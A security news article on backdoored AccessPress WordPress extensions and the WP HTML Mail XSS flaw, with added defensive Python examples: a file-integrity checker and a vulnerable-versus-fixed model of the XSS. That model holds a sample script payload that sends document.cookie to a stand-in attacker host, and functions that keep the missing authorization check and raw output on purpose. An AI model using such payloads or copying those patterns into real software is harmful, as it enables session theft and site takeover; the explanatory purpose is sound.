Secret Backdoors Discovered In WordPress Plugins and Themes

In another software supply chain attack, dozens of WordPress themes and plugins hosted on a developer's own website were backdoored with malicious code in September 2021, so that every site installing them would be compromised in turn.

The backdoor gave attackers full administrative control over websites running any of the 40 themes and 53 plugins belonging to AccessPress Themes, a Nepal-based company that claims no fewer than 360,000 active website installations.

Security researchers from Jetpack stated that the infected extensions contained a dropper for a web shell that gives attackers full access to the infected sites. The same extensions were clean when downloaded or installed directly from the WordPress[.]org directory; only copies obtained from the vendor's own website carried the backdoor.

The backdoor has been assigned the identifier CVE-2021-24867. In a separate analysis, web security company Sucuri said that some of the infected websites found carrying this backdoor had spam payloads dating back almost three years, suggesting that the actors behind the operation were selling access to the sites to operators of other spam campaigns.

Earlier this month, the cybersecurity firm eSentire disclosed how compromised WordPress websites belonging to legitimate businesses are being used as a hotbed for malware delivery, serving unsuspecting users who search Google for intellectual property agreements with an implant called GootLoader.


Website owners who installed plugins or themes from AccessPress Themes' own website should upgrade immediately to a safe version or replace them with the latest version from the WordPress.org directory. Updating the extension alone is not sufficient: a clean copy of WordPress also needs to be deployed to revert the modifications made when the backdoor was installed.
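Because the same extensions were clean on WordPress.org, the practical check is to compare what is installed on disk with a trusted per-version file manifest and flag anything modified, added or missing. The script below is an added example written for this article, not Jetpack's, Sucuri's or AccessPress Themes' code. It assumes a manifest shaped as a JSON object whose "files" map maps relative paths to a "sha256" digest (the shape WP-CLI's `wp plugin verify-checksums` consumes from WordPress.org is similar, but that is an assumption here, not something the article states), and it builds its own constructed two-file plugin in a temporary directory, tampered with the way a dropper would tamper: an include appended to the main file plus one new file.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 (plugin bundles can carry large assets)."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_plugin(plugin_dir, manifest_json: str) -> dict:
    """Compare every file under plugin_dir with a trusted manifest.

    Returns sorted lists of relative paths that are 'modified' (digest differs),
    'unexpected' (present on disk but absent from the manifest; this is where an
    injected loader or web shell shows up) and 'missing'.
    Manifest format ({"files": {"rel/path": {"sha256": ...}}}) is an assumption.
    """
    plugin_dir = Path(plugin_dir)
    expected = json.loads(manifest_json)["files"]
    present = {
        p.relative_to(plugin_dir).as_posix(): sha256_of(p)
        for p in plugin_dir.rglob("*")
        if p.is_file()
    }
    return {
        "modified": sorted(
            f for f in present if f in expected and present[f] != expected[f]["sha256"]
        ),
        "unexpected": sorted(f for f in present if f not in expected),
        "missing": sorted(f for f in expected if f not in present),
    }


def build_constructed_sample():
    """Constructed sample plugin (not a real package): write the tampered tree to
    a temp dir and return (plugin_dir, manifest_json) where the manifest describes
    the clean release."""
    clean = {
        "demo-plugin.php": b"<?php\n/* Plugin Name: Demo Plugin */\n",
        "inc/helpers.php": b"<?php\nfunction demo_helper() { return 1; }\n",
    }
    manifest = {
        "plugin": "demo-plugin",
        "version": "1.0.0",
        "files": {rel: {"sha256": hashlib.sha256(data).hexdigest()} for rel, data in clean.items()},
    }
    tampered = dict(clean)
    # A dropper typically hooks the main plugin file and adds its own loader.
    tampered["demo-plugin.php"] += b"@include __DIR__ . '/inc/loader.php';\n"
    tampered["inc/loader.php"] = b"<?php /* constructed stand-in for an injected loader */\n"

    root = Path(tempfile.mkdtemp(prefix="wp-plugin-"))
    for rel, data in tampered.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return root, json.dumps(manifest)


def run_demo() -> dict:
    plugin_dir, manifest_json = build_constructed_sample()
    return verify_plugin(plugin_dir, manifest_json)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

On a real site, point verify_plugin at wp-content/plugins/<slug> with the manifest for the exact installed version, and run the same comparison for WordPress core, since the article notes that the backdoor's modifications extend beyond the extension itself. Treat any "unexpected" PHP file as an incident indicator rather than a false positive until proven otherwise.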

These findings also come as WordPress security company Wordfence disclosed details of a now-patched cross-site scripting (XSS) vulnerability in a plugin called "WordPress Email Template Designer – WP HTML Mail", which is installed on more than 20,000 websites.

Tracked as CVE-2022-0218 and rated 8.3 on the CVSS vulnerability scoring system, the flaw was addressed in version 3.1, released on January 13, 2022.

The flaw allowed an unauthenticated attacker to inject malicious JavaScript that would execute whenever a site administrator opened the template editor. The same access also let the attacker modify the email template to contain arbitrary content, which could be used to phish anyone who received emails from the affected site.
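Two separate defects have to line up for the outcome described above: the write path that stores the template accepts unauthenticated callers, and the admin page that displays the template renders it raw, so stored script runs with the administrator's session. The model below is an added example written for this article in Python; it is not the plugin's code, and the plugin's actual endpoint is not described here. The User class, the STORE dictionary, the capability name and the attacker and phishing URLs (".invalid" hosts) are all constructed for the example. The vulnerable functions keep both defects; the fixed ones add the capability gate and escape on output.

```python
import html

ADMIN_CAP = "manage_options"  # capability an admin-only editor would require
STORE = {"template": "<p>Hello {{name}}</p>"}  # constructed stand-in for the saved option


class User:
    def __init__(self, caps=()):
        self.caps = set(caps)


def save_template_vulnerable(user: User, body: str) -> bool:
    """Defect 1: no check on who is calling, so an unauthenticated request can
    overwrite the template with script or phishing content."""
    STORE["template"] = body
    return True


def save_template_fixed(user: User, body: str) -> bool:
    """Gate the write on a capability. WordPress equivalent: current_user_can()
    in the REST route's permission_callback, or before handling the AJAX action."""
    if ADMIN_CAP not in user.caps:
        return False
    STORE["template"] = body
    return True


def render_editor_vulnerable() -> str:
    """Defect 2: the stored template is echoed raw into the admin page, so any
    <script> an attacker stored executes in the administrator's browser."""
    return '<div id="editor">' + STORE["template"] + "</div>"


def render_editor_fixed() -> str:
    """Escape on output: inside a textarea the markup is displayed as text rather
    than parsed (WordPress equivalent: esc_textarea()). Because the template is
    still sent out as HTML mail, allow-list sanitising on save (wp_kses_post)
    is the second layer; output escaping alone does not fix the phishing case."""
    return '<textarea id="editor">' + html.escape(STORE["template"]) + "</textarea>"


def demo() -> dict:
    """Replay a constructed unauthenticated injection against both code paths."""
    payload = (
        '<p>Reset your password at https://example.invalid/</p>'
        '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    )
    anon = User()

    STORE["template"] = "<p>Hello {{name}}</p>"
    anon_write_vulnerable = save_template_vulnerable(anon, payload)
    page_vulnerable = render_editor_vulnerable()

    STORE["template"] = "<p>Hello {{name}}</p>"
    anon_write_fixed = save_template_fixed(anon, payload)
    # A template stored before the fix shipped must still be inert in the editor.
    STORE["template"] = payload
    page_fixed = render_editor_fixed()

    return {
        "anon_write_vulnerable": anon_write_vulnerable,
        "anon_write_fixed": anon_write_fixed,
        "script_runs_vulnerable": "<script>" in page_vulnerable,
        "script_runs_fixed": "<script>" in page_fixed,
    }


if __name__ == "__main__":
    print(demo())
```

The order of the two fixes matters for incident response: patching only the render path leaves an attacker able to rewrite the template for phishing, and patching only the write path leaves any template injected before the update ready to fire the next time an administrator opens the editor.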

According to published statistics, 2,240 security flaws were discovered and reported in third-party WordPress plugins towards the end of 2021, up 142% from 2020, when nearly 1,000 vulnerabilities were disclosed, bringing the total number of WordPress plugin vulnerabilities uncovered to date to 10,359.
